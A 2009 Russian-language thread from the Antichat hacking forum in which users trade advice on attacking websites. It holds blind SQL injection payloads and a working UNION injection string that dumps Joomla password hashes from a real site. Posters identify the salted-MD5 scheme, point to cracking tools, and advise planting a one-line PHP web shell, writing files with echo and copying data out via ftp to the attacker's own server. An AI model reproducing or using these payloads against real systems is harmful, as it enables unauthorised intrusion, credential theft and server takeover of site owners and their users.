HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.10.2009, 14:12
Aртем
Познающий
Регистрация: 18.10.2009
Сообщений: 68
С нами: 8717851

Репутация: 90
По умолчанию

Цитата:
Сообщение от jokester  
Aртем
Давай линк и конечную цель.
Я не понимаю почему именно такой способ перебора?
Если ошибки не отключены, то можно вообще сделать вывод в ошибке если версия базы подходящая, а у тебя больше похоже на изврат, ну или я не понимаю целей.
И опять-же с трудом представляю, как могут не работать and и or. Так не бывает, что-то ты не правильно делаешь и скрипт тут не причём.
> Я не понимаю почему именно такой способ перебора?
Это скорее всего не способ перебора, а проверка возможных фильтраций и реагирование скрипта на запросы.
Можно конечно перебирать основываясь на ошибки, можно даже использовать какой-нибудь специализированный софт или же что-нибудь подобное. Но меня интересует непосредственно ручная работа.
И линк к сожалению я дать не могу.
Но если кто-нибудь мне сможет дать уже готовых скриптов в которых есть уязвимости подобного характера, для повышения собственного уровня знаний в этом направлении буду благодарен.
Потому как с Blind SQL inj встречаюсь довольно редко, точнее старался их избегать, но как показала практика, знания в этой области мне необходимы, т.к. они попросту видимо отсутствуют, и еще был бы признателен на соответствующие статьи по поводу Blind SQL быть может я что-то упустил.
 
Ответить с цитированием

  #2  
Старый 25.10.2009, 00:46
Aртем
Познающий
Регистрация: 18.10.2009
Сообщений: 68
С нами: 8717851

Репутация: 90
По умолчанию

Цитата:
Сообщение от Aртем  
> Я не понимаю почему именно такой способ перебора?
Это скорее всего не способ перебора, а проверка возможных фильтраций и реагирование скрипта на запросы.
Можно конечно перебирать основываясь на ошибки, можно даже использовать какой-нибудь специализированный софт или же что-нибудь подобное. Но меня интересует непосредственно ручная работа.
И линк к сожалению я дать не могу.
Но если кто-нибудь мне сможет дать уже готовых скриптов в которых есть уязвимости подобного характера, для повышения собственного уровня знаний в этом направлении буду благодарен.
Потому как с Blind SQL inj встречаюсь довольно редко, точнее старался их избегать, но как показала практика, знания в этой области мне необходимы, т.к. они попросту видимо отсутствуют, и еще был бы признателен на соответствующие статьи по поводу Blind SQL быть может я что-то упустил.
Хотелось бы услышать ответ на мой вопрос.
 
Ответить с цитированием

  #3  
Старый 25.10.2009, 01:13
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Aртем  
Хотелось бы услышать ответ на мой вопрос.
Тут нет никакого вопроса. Ты не первый день на форуме. Статьи все в разделе СТАТЬИ, а слепые скули, конечно тебе никто собирать не будет. Поиск по теме SQL думаю поможет нарыть кучу примеров, в конце концов на локалке напиши скрипт и тренируйся, если интересно. И не обязательно искать слепые, можешь на любой пробовать, просто расскручивай её как будто вывода нет, вот и вся практика.
 
Ответить с цитированием

  #4  
Старый 25.10.2009, 03:00
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами: 10227206

Репутация: 2163
По умолчанию

Артем, если вопрос был про and/or, то:
1. true'>if(locate(1,(substring((select+id+from+users +where+id=1),1,1))),0,1)
2. false' union select * from table where locate(...)
если про практику, то ответ в последней строчке постом выше
 
Ответить с цитированием

  #5  
Старый 24.10.2009, 15:06
Train
Новичок
Регистрация: 09.01.2009
Сообщений: 21
С нами: 9124815

Репутация: 10
По умолчанию

Здравствуйте уважаемые Гуру античата.
У меня возникла небольшая проблемка: нашел Sql-inj в джумле, все шикарно, только одно но:
union+select+1,2,3,group_concat(password),5+from+j os_users--
выводит пароли вида:
fec1d6a80adcaefd7e3823362dd89a00:wJpMRIYmjv7FBWdXn zVnvH0gMziLnCCx
С джумлой я что-то уже давно не встречался, может я что-то пропустил относительно того как хранится пароль в последних версиях? Версию джумлы кстати определить не удалось: файлик ___.php-dist или как его там, был честно переименован админом.
И если не сложно, если не сложно, дайте ссылку на пост где различные пути к конфигу апача лежат ибо /usr/local/apache/conf/httpd.conf находится в девственной неприкосновенности, а раскрытие путей нигде не нашел больше
 
Ответить с цитированием

  #6  
Старый 24.10.2009, 15:16
Aртем
Познающий
Регистрация: 18.10.2009
Сообщений: 68
С нами: 8717851

Репутация: 90
По умолчанию

Цитата:
Сообщение от Train  
Здравствуйте уважаемые Гуру античата.
У меня возникла небольшая проблемка: нашел Sql-inj в джумле, все шикарно, только одно но:
union+select+1,2,3,group_concat(password),5+from+j os_users--
выводит пароли вида:
fec1d6a80adcaefd7e3823362dd89a00:wJpMRIYmjv7FBWdXn zVnvH0gMziLnCCx
С джумлой я что-то уже давно не встречался, может я что-то пропустил относительно того как хранится пароль в последних версиях? Версию джумлы кстати определить не удалось: файлик ___.php-dist или как его там, был честно переименован админом.
И если не сложно, если не сложно, дайте ссылку на пост где различные пути к конфигу апача лежат ибо /usr/local/apache/conf/httpd.conf находится в девственной неприкосновенности, а раскрытие путей нигде не нашел больше
Вот здесь можно найти пути к log и config файлам:
http://forum.antichat.ru/thread49775.html

А хеш:
Код:
fec1d6a80adcaefd7e3823362dd89a00:wJpMRIYmjv7FBWdXnzVnvH0gMziLnCCx
Зашифрован алгоритмом md5($pass.$salt) который есть в программе PasswordsPro.
Администраторская панель находится чаще по адресу site/joompatch/administrator/ т.к. в Joomla сложно переименовать эту директорию.
 
Ответить с цитированием

  #7  
Старый 24.10.2009, 15:24
Train
Новичок
Регистрация: 09.01.2009
Сообщений: 21
С нами: 9124815

Репутация: 10
По умолчанию

Большое спасибо. Попробую пока конфиги почитать, мож найду абсолютный путь... а то не охота брутить его, хотя видюха с CUDA реально великая вещь в этом деле.
 
Ответить с цитированием

  #8  
Старый 24.10.2009, 18:01
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами: 9594385

Репутация: 386
По умолчанию

лей <?php system($_GET[cmd]) ?> а через него зальеш уже все полноценный если надо будет
 
Ответить с цитированием

  #9  
Старый 24.10.2009, 18:02
M1ks
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
С нами: 9851463

Репутация: 19
По умолчанию

а в вин как лить через кмд?
 
Ответить с цитированием

  #10  
Старый 24.10.2009, 18:04
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами: 9594385

Репутация: 386
По умолчанию

через команду ftp подконекться к своему фтпешнику и слей что нужно, или можеш попробывать создать нужный тебе файл примерно так
Код:
echo "<?php phpinfo(); ?>" > test.php

Последний раз редактировалось warlok; 24.10.2009 в 18:07..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.